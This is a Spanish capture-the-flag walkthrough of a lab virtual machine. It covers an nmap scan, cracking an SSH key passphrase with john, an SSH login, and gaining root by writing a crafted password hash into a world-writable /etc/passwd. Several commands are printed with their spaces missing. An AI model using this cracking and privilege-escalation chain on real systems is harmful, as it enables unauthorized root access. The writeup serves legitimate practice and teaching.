Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 10:05 CEST
Nmap scan report for 192.168.5.134
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8f:ec:55:07:54:78:a4:ee:8e:d7:95:41:62:74:77:8e (RSA)
| 256 7c:67:19:8b:bf:73:b4:7f:82:64:df:d5:7b:ad:34:a4 (ECDSA)
|_ 256 a1:e7:61:a1:cc:6b:16:10:1c:71:fa:54:ed:89:fd:4c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:CE:93:AA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds
Vemos que es una id_rsa por lo que se ve tiene contraseña, por lo que haremos lo siguiente...
ssh2johnid_rsa>sshkey
john--wordlist=<WORDLIST>sshkey
Info:
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
reading (id_rsa)
1g 0:00:00:00 DONE (2024-07-13 10:15) 2.173g/s 6678p/s 6678c/s 6678C/s kikay..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Veremos que la contraseña es reading por lo que haremos lo siguiente...
chmod600id_rsa
Vemos que en el .txt nos dijo un nombre por lo que probaremos con ese nombre agentr...
ssh-iid_rsaagentr@<IP>
Metemos la contraseña del id_rsa y ya estariamos dentro con el usuario agentr...
Leeremos la flag del la /home...
user.txt (flag1)
[Arabic]
الإحداثيات الأولى هي 25 درجة شمالا
[English]
The First coordinate is 25.0000° N
Si vemos los permisos del siguiente archivo...
ls-la/etc/passwd
Info:
-rw-r--rw- 1 root root 1763 Dec 24 2020 /etc/passwd
Vemos que podemos escribir, por lo que haremos lo siguiente...
Nos descargaremos la siguiente herramienta creada por mi (@d1se0) en github...
Generara una contraseña aleatoria poniendo el numero de letras que quiere que tenga en mi caso solo 3 para que sea corta y codificarlo en unix_passwd, por lo que ese codigo codificado es lo que tenemos que pegar en el /etc/passwd de la siguiente manera...
nano/etc/passwd#Dntro del nanoroot:$6$rounds=656000$bbwClv8EHMh/evoj$8vAkS.wJphWsDfdteK1sIc8eebShfmUMHhKEQQvmm3N4rEPCC5uzjTVaK2uarnB8/qIQHYtpZ8l/g1ur54VKL1:0:0:root:/root:/bin/bash
Quedara algo tal que asi, por lo que lo guardamos e intentamos ser root poniendo esa contraseña generada en mi caso v4l...
suroot
Y si metemos la contraseña sin codificar veremos que seremos root...
id
Info:
uid=0(root) gid=0(root) groups=0(root)
Por lo que leeremos la flag...
root.txt (flag2)
[ARABIC]
الإحداثيات الثانية هي 71 درجة غربا
[ENGLISH]
The Second coordinate is 71.0000° W